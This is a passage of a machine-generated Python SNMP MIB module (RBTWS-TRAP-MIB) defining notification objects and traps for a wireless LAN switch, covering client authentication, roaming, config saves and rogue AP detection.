used within notifications and is not accessible.') rbtwsRFDetectClassificationReason = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 81), RbtwsRFDetectClassificationReason()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRFDetectClassificationReason.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectClassificationReason.setDescription('Indicates the reason why a RF device is classified the way it is. This object is used within notifications and is not accessible.') rbtwsConfigSaveFileName = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 82), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsConfigSaveFileName.setStatus('current') if mibBuilder.loadTexts: rbtwsConfigSaveFileName.setDescription('Display string listing the name of the file to which the running configuration was saved. This object is used within notifications and is not accessible.') rbtwsConfigSaveInitiatorType = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 83), RbtwsConfigSaveInitiatorType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsConfigSaveInitiatorType.setStatus('current') if mibBuilder.loadTexts: rbtwsConfigSaveInitiatorType.setDescription('Indicates the source that initiated a configuration save. This object is used within notifications and is not accessible.') rbtwsConfigSaveInitiatorIp = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 84), IpAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsConfigSaveInitiatorIp.setStatus('current') if mibBuilder.loadTexts: rbtwsConfigSaveInitiatorIp.setDescription('The IP address of the source that initiated a configuration save. This object is used within notifications and is not accessible.') rbtwsConfigSaveInitiatorDetails = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 85), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsConfigSaveInitiatorDetails.setStatus('current') if mibBuilder.loadTexts: rbtwsConfigSaveInitiatorDetails.setDescription('Display string listing additional information regarding the source that initiated a configuration save, when available. This object is used within notifications and is not accessible.') rbtwsConfigSaveGeneration = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 86), Counter32()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsConfigSaveGeneration.setStatus('current') if mibBuilder.loadTexts: rbtwsConfigSaveGeneration.setDescription('Indicates the number of configuration changes since the last system boot. The generation count is used to track the number of times the running configuration has been changed due to administrative actions (set/clear), SNMP requests (SET), XML requests (e.g. RASM). This object is used within notifications and is not accessible.') rbtwsApNum = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 87), RbtwsApNum()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsApNum.setStatus('current') if mibBuilder.loadTexts: rbtwsApNum.setDescription('The administratively assigned AP Number, unique on same AC (switch), regardless of how APs are attached to the AC. This object is used within notifications and is not accessible. Obsoletes rbtwsApPortOrDapNum. For clarity, use this object to identify an AP since in 6.0 directly attached APs and DAPs were unified.') rbtwsRadioMode = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 88), RbtwsRadioMode()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRadioMode.setStatus('current') if mibBuilder.loadTexts: rbtwsRadioMode.setDescription('Indicates the administratively controlled Radio Mode (enabled/disabled/sentry). This object is used within notifications and is not accessible.') rbtwsMichaelMICFailureCause = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 89), RbtwsMichaelMICFailureCause()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsMichaelMICFailureCause.setStatus('current') if mibBuilder.loadTexts: rbtwsMichaelMICFailureCause.setDescription('Indicates the Michael MIC Failure cause / who detected it. This object is used within notifications and is not accessible.') rbtwsClientAccessMode = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 90), RbtwsClientAccessMode()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientAccessMode.setStatus('current') if mibBuilder.loadTexts: rbtwsClientAccessMode.setDescription('The client access mode (ap, wired). This object is used within notifications and is not accessible. Intended to replace rbtwsClientAccessType. (In 6.0, direct- and network-attached APs were unified.)') rbtwsClientAuthorizationReason = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 91), RbtwsClientAuthorizationReason()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientAuthorizationReason.setStatus('current') if mibBuilder.loadTexts: rbtwsClientAuthorizationReason.setDescription('Indicates the reason why client performed AAA authorization. This object is used within notifications and is not accessible.') rbtwsPhysPortNum = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 92), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 1024))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsPhysPortNum.setStatus('current') if mibBuilder.loadTexts: rbtwsPhysPortNum.setDescription("Physical Port Number on the AC. Zero means the port is unknown or not applicable (for example, when rbtwsClientAccessMode = 'ap'). This object is used within notifications and is not accessible.") rbtwsApMgrOldIp = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 93), IpAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsApMgrOldIp.setStatus('current') if mibBuilder.loadTexts: rbtwsApMgrOldIp.setDescription("The IP address of the AP's former primary manager switch. This object is used within notifications and is not accessible.") rbtwsApMgrNewIp = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 94), IpAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsApMgrNewIp.setStatus('current') if mibBuilder.loadTexts: rbtwsApMgrNewIp.setDescription("The IP address of the AP's new primary manager switch. This address was formerly the AP's secondary backup link. This object is used within notifications and is not accessible.") rbtwsApMgrChangeReason = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 95), RbtwsApMgrChangeReason()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsApMgrChangeReason.setStatus('current') if mibBuilder.loadTexts: rbtwsApMgrChangeReason.setDescription("Indicates the reason why the AP's primary manager changed. This object is used within notifications and is not accessible.") rbtwsClientClearedReason = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 96), RbtwsClientClearedReason()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientClearedReason.setStatus('current') if mibBuilder.loadTexts: rbtwsClientClearedReason.setDescription('Indicates the reason why client was cleared. This object is used within notifications and is not accessible.') rbtwsMobilityDomainResiliencyStatus = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 97), RbtwsMobilityDomainResiliencyStatus()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsMobilityDomainResiliencyStatus.setStatus('current') if mibBuilder.loadTexts: rbtwsMobilityDomainResiliencyStatus.setDescription('Indicates the current resilient capacity status for a mobility domain. This object is used within notifications and is not accessible.') rbtwsClientSessionElapsedSeconds = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 98), Unsigned32()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientSessionElapsedSeconds.setStatus('current') if mibBuilder.loadTexts: rbtwsClientSessionElapsedSeconds.setDescription('Indicates the time in seconds elapsed since the start of the Client Session. This object is used within notifications and is not accessible.') rbtwsRadioChannelWidth = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 99), RbtwsRadioChannelWidth()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRadioChannelWidth.setStatus('current') if mibBuilder.loadTexts: rbtwsRadioChannelWidth.setDescription('Indicates the administratively controlled Channel Width (20MHz/40MHz). This object is used within notifications and is not accessible.') rbtwsRadioMimoState = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 100), RbtwsRadioMimoState()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRadioMimoState.setStatus('current') if mibBuilder.loadTexts: rbtwsRadioMimoState.setDescription('Indicates the Radio MIMO State, as seen by the AC (1x1/2x3/3x3). This object is used within notifications and is not accessible.') rbtwsClientRadioType = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 101), RbtwsRadioType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientRadioType.setStatus('current') if mibBuilder.loadTexts: rbtwsClientRadioType.setDescription('Indicates the Client Radio Type, as detected by an attached AP and reported to the AC. This object is used within notifications and is not accessible.') rbtwsRFDetectXmtrRadioType = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 102), RbtwsRadioType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRFDetectXmtrRadioType.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectXmtrRadioType.setDescription('Indicates the Radio Type of the Transmitter, as detected by an attached AP and reported to the AC. The Transmitter may be a wireless client or an AP. This object is used within notifications and is not accessible.') rbtwsRFDetectXmtrCryptoType = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 103), RbtwsCryptoType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRFDetectXmtrCryptoType.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectXmtrCryptoType.setDescription('Indicates the Crypto Type used by the Transmitter, as detected by an attached AP and reported to the AC. This object is used within notifications and is not accessible.') rbtwsClusterFailureReason = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 104), RbtwsClusterFailureReason()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClusterFailureReason.setStatus('current') if mibBuilder.loadTexts: rbtwsClusterFailureReason.setDescription('Indicates the reason why cluster configuration failed to apply. This object is used within notifications and is not accessible.') rbtwsClusterFailureDescription = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 105), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClusterFailureDescription.setStatus('current') if mibBuilder.loadTexts: rbtwsClusterFailureDescription.setDescription('Display string for describing the cluster configuration failure cause. This object is used within notifications and is not accessible.') rbtwsDeviceFailTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 1)).setObjects(("RBTWS-TRAP-MIB", "rbtwsDeviceId")) if mibBuilder.loadTexts: rbtwsDeviceFailTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsDeviceFailTrap.setDescription('The device has a failure indication') rbtwsDeviceOkayTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 2)).setObjects(("RBTWS-TRAP-MIB", "rbtwsDeviceId")) if mibBuilder.loadTexts: rbtwsDeviceOkayTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsDeviceOkayTrap.setDescription('The device has recovered') rbtwsPoEFailTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 3)).setObjects(("RBTWS-TRAP-MIB", "rbtwsPortNum")) if mibBuilder.loadTexts: rbtwsPoEFailTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsPoEFailTrap.setDescription('PoE has failed on the indicated port') rbtwsApTimeoutTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 4)).setObjects(("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsAPAccessType"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum")) if mibBuilder.loadTexts: rbtwsApTimeoutTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsApTimeoutTrap.setDescription("The AP entering the AC at port rbtwsPortNum with MAC rbtwsRadioMacAddress and of the access type (ap or dap) has not responded. Replaced by rbtwsApNonOperStatusTrap2, with rbtwsApTransition = 'timeout'.") rbtwsAPBootTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 5)).setObjects(("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsAPAccessType"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum")) if mibBuilder.loadTexts: rbtwsAPBootTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsAPBootTrap.setDescription("The AP entering the AC at port rbtwsPortNum with MAC rbtwsRadioMacAddress and of the access type (ap or dap) has booted. Replaced by rbtwsApNonOperStatusTrap2, with rbtwsApTransition = 'bootSuccess'.") rbtwsMobilityDomainJoinTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 6)).setObjects(("RBTWS-TRAP-MIB", "rbtwsMobilityDomainIp")) if mibBuilder.loadTexts: rbtwsMobilityDomainJoinTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsMobilityDomainJoinTrap.setDescription('The mobility domain member has received an UP notice from the remote address.') rbtwsMobilityDomainTimeoutTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 7)).setObjects(("RBTWS-TRAP-MIB", "rbtwsMobilityDomainIp")) if mibBuilder.loadTexts: rbtwsMobilityDomainTimeoutTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsMobilityDomainTimeoutTrap.setDescription('The mobility domain member has declared the remote address to be DOWN.') rbtwsMpMichaelMICFailure = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 8)).setObjects(("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress")) if mibBuilder.loadTexts: rbtwsMpMichaelMICFailure.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsMpMichaelMICFailure.setDescription('Two Michael MIC failures were seen within 60 seconds of each other. Obsoleted by rbtwsMichaelMICFailure.') rbtwsRFDetectRogueAPTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 9)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo")) if mibBuilder.loadTexts: rbtwsRFDetectRogueAPTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsRFDetectRogueAPTrap.setDescription('This trap is sent when RF detection finds a rogue AP. XmtrMacAddr is the radio MAC address from the beacon. ListenerListInfo is a display string of a list of listener information. Obsoleted by rbtwsRFDetectRogueDeviceTrap2.') rbtwsRFDetectAdhocUserTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 10)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo")) if mibBuilder.loadTexts: rbtwsRFDetectAdhocUserTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectAdhocUserTrap.setDescription('This trap is sent when RF detection sweep finds a ad-hoc user. rbtwsRFDetectXmtrMacAddr is the MAC address of the ad-hoc user. rbtwsRFDetectListenerListInfo is a display string of a list of listener information.') rbtwsRFDetectRogueDisappearTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 11)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr")) if mibBuilder.loadTexts: rbtwsRFDetectRogueDisappearTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsRFDetectRogueDisappearTrap.setDescription('This trap is sent when a rogue has disappeared. Obsoleted by rbtwsRFDetectRogueDeviceDisappearTrap.') rbtwsClientAuthenticationFailureTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 12)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthServerIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthenProtocolType"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthenticationFailureCause"), ("RBTWS-TRAP-MIB", "rbtwsClientFailureCauseDescription")) if mibBuilder.loadTexts: rbtwsClientAuthenticationFailureTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsClientAuthenticationFailureTrap.setDescription('This trap is sent if a client authentication fails.') rbtwsClientAuthorizationFailureTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 13)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthServerIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthenProtocolType"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsClientLocationPolicyIndex"), ("RBTWS-TRAP-MIB", "rbtwsUserParams"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthorizationFailureCause"), ("RBTWS-TRAP-MIB", "rbtwsClientFailureCauseDescription")) if mibBuilder.loadTexts: rbtwsClientAuthorizationFailureTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsClientAuthorizationFailureTrap.setDescription('This trap is sent if a client authorization fails.') rbtwsClientAssociationFailureTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 14)).setObjects(("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsClientAssociationFailureCause"), ("RBTWS-TRAP-MIB", "rbtwsClientFailureCauseDescription")) if mibBuilder.loadTexts: rbtwsClientAssociationFailureTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsClientAssociationFailureTrap.setDescription('This trap is sent if a client association fails.') rbtwsClientAuthorizationSuccessTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 15)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientIp"), ("RBTWS-TRAP-MIB", "rbtwsClientVLANName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionState"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionStartTime"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthServerIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthenProtocolType"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsRadioRssi")) if mibBuilder.loadTexts: rbtwsClientAuthorizationSuccessTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsClientAuthorizationSuccessTrap.setDescription('This trap is sent when a client authorizes. Obsoleted by rbtwsClientAuthorizationSuccessTrap4.') rbtwsClientDeAssociationTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 16)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientIp"), ("RBTWS-TRAP-MIB", "rbtwsClientVLANName"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthServerIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthenProtocolType"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID")) if mibBuilder.loadTexts: rbtwsClientDeAssociationTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsClientDeAssociationTrap.setDescription('This trap is sent if a client de-association occurred.') rbtwsClientRoamingTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 17)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsClientRoamedFromAccessType"), ("RBTWS-TRAP-MIB", "rbtwsClientRoamedFromPortNum"), ("RBTWS-TRAP-MIB", "rbtwsClientRoamedFromRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsClientRoamedFromDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsClientRoamedFromWsIp"), ("RBTWS-TRAP-MIB", "rbtwsClientTimeSinceLastRoam")) if mibBuilder.loadTexts: rbtwsClientRoamingTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsClientRoamingTrap.setDescription('This trap is sent if a client roams from one location to another.') rbtwsAutoTuneRadioPowerChangeTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 18)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRadioMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsNewPowerLevel"), ("RBTWS-TRAP-MIB", "rbtwsOldPowerLevel"), ("RBTWS-TRAP-MIB", "rbtwsRadioPowerChangeReason"), ("RBTWS-TRAP-MIB", "rbtwsRadioPowerChangeDescription")) if mibBuilder.loadTexts: rbtwsAutoTuneRadioPowerChangeTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsAutoTuneRadioPowerChangeTrap.setDescription("This trap is sent if a radio's power level has changed based on auto-tune.") rbtwsAutoTuneRadioChannelChangeTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 19)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRadioMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsNewChannelNum"), ("RBTWS-TRAP-MIB", "rbtwsOldChannelNum"), ("RBTWS-TRAP-MIB", "rbtwsChannelChangeReason")) if mibBuilder.loadTexts: rbtwsAutoTuneRadioChannelChangeTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsAutoTuneRadioChannelChangeTrap.setDescription("This trap is sent if a radio's channel has changed based on auto-tune.") rbtwsCounterMeasureStartTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 20)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRadioMACAddress")) if mibBuilder.loadTexts: rbtwsCounterMeasureStartTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsCounterMeasureStartTrap.setDescription('This trap is sent when counter measures are started against a rogue. rbtwsRFDetectXmtrMacAddr is the mac address of the rogue we are doing counter measures against. rbtwsRadioMACAddress identifies the radio performing the countermeasures.') rbtwsCounterMeasureStopTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 21)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRadioMACAddress")) if mibBuilder.loadTexts: rbtwsCounterMeasureStopTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsCounterMeasureStopTrap.setDescription('This trap is sent when counter measures are stopped against a rogue. rbtwsRFDetectXmtrMacAddr is the mac address of the rogue we were doing counter measures against. rbtwsRadioMACAddress identifies the radio performing the countermeasures.') rbtwsClientDot1xFailureTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 22)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthenProtocolType"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsClientDot1xState"), ("RBTWS-TRAP-MIB", "rbtwsClientDot1xFailureCause"), ("RBTWS-TRAP-MIB", "rbtwsClientFailureCauseDescription")) if mibBuilder.loadTexts: rbtwsClientDot1xFailureTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsClientDot1xFailureTrap.setDescription('This trap is sent if a client failed 802.1X.') rbtwsClientClearedTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 23)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionElapsedTime"), ("RBTWS-TRAP-MIB", "rbtwsLocalId")) if mibBuilder.loadTexts: rbtwsClientClearedTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsClientClearedTrap.setDescription('This trap is sent when a client session is cleared. Obsoleted by rbtwsClientClearedTrap2.') rbtwsClientAuthorizationSuccessTrap2 = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 24)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientIp"), ("RBTWS-TRAP-MIB", "rbtwsClientVLANName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionState"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionStartTime"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthServerIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthenProtocolType"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsUserAccessType"), ("RBTWS-TRAP-MIB", "rbtwsLocalId")) if mibBuilder.loadTexts: rbtwsClientAuthorizationSuccessTrap2.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsClientAuthorizationSuccessTrap2.setDescription('This trap is sent when a client authorizes. Obsoleted by rbtwsClientAuthorizationSuccessTrap4.') rbtwsRFDetectSpoofedMacAPTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 25)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo")) if mibBuilder.loadTexts: rbtwsRFDetectSpoofedMacAPTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsRFDetectSpoofedMacAPTrap.setDescription('This trap is sent when RF detection finds an AP using the MAC of the listener. rbtwsRFDetectXmtrMacAddr is the radio MAC address from the beacon. rbtwsRFDetectListenerListInfo is a display string of a list of listener information. Obsoleted by rbtwsRFDetectDoSTrap and rbtwsRFDetectRogueDeviceTrap2. One of the two traps will be sent depending on the type of AP MAC spoofing detected.') rbtwsRFDetectSpoofedSsidAPTrap = NotificationType((1, 